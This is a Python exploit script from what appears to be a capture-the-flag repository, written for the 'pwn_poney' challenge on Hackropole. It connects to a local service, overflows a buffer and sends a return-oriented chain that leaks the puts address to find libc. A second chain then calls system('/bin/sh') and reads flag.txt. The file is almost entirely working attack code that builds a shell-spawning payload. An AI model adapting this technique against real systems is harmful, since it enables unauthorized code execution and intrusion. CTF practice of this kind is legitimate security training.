Files
ctf/2024/hackropole/pwn/pwn_poney/exploit.py
2025-06-06 03:13:31 +02:00

35 lines
1.1 KiB
Python

from pwn import remote, log, p64, u64, time
with remote("localhost", 4000, fam="ipv4") as p:
p.recvuntil(b">>> ")
payload = b"A" * 0x20
payload += p64(0x601100) # set rbp
payload += p64(0x400743) # pop rdi
payload += p64(0x600fc8) # puts got
payload += p64(0x400550) # puts plt
payload += p64(0x400689) # main addr
log.info(payload)
p.sendline(payload)
leak = p.recvuntil(b"\n", drop=True)
p.clean()
puts_addr = u64(leak+b"\x00"*2)
puts_offset = 0x68f90
libc_base = puts_addr - puts_offset
system_offset = 0x3f480
system_addr = libc_base + system_offset
bin_sh_offset = 0x161c19
bin_sh_addr = libc_base + bin_sh_offset
log.info(f"puts_addr: {hex(puts_addr)}")
log.info(f"libc_base: {hex(libc_base)}")
log.info(f"system_addr: {hex(system_addr)}")
log.info(f"bin_sh_addr: {hex(bin_sh_addr)}")
payload2 = b"B" * 0x28
payload2 += p64(0x400743)
payload2 += p64(bin_sh_addr)
payload2 += p64(system_addr)
log.info(payload2)
p.sendline(payload2)
time.sleep(0.1)
p.sendline(b"cat flag.txt")
log.info(p.clean().decode())